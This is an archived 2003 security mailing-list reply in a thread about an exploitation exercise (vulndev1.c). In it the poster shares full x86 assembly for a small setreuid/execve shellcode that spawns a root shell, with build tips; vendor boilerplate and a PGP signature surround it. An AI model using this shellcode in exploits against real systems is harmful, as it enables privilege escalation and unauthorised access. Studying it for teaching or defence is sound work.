Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

i havent been really following the thread too much; although i did take a look at the code (vulndev1.c), anyways if someone is having a problem w/ shellcode here is the asm for a generic sys_setreuid/execve shellcode thats on the smaller side.

.section .text

        .global _s

_s:

	xorl  %ebx,  %ebx
	xorl  %ecx,  %ecx
	movb  $0x46, %al    # sys_setreuid
	int   $0x80

	xorl  %eax,  %eax
	pushl %eax
	pushl $0x6873612f   # hsa/
	pushl $0x6e69622f   # nib/
	movl  %esp,  %ebx
	pushl %eax
	pushl %ebx
	movl  %esp,  %ecx
	xorl  %edx,  %edx
	movb  $0xb,  %al    # sys_execve
	int   $0x80

ah this calls /bin/ash if you dont have it, change the string and make sure to pass the -e flag to ld. its small, it comes out to like 20+b or similar, i cant remember.

if i misread a post, well ignore me

"Once set in motion, the process of questioning could come to but one end, the erosion of conviction and certitude and collapse into despair" (The Specter of the Absurd, 1988).

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)

iD8DBQE+zkcioEcehqzkkpgRAr4cAKC9sThgCtXl3BP+ckajYpdxSTVtJwCdHPiR 9cRbv8KlM4VdSkJHxkHU1jc=
=80gt
-----END PGP SIGNATURE-----
Received on Fri May 23 12:27:00 2003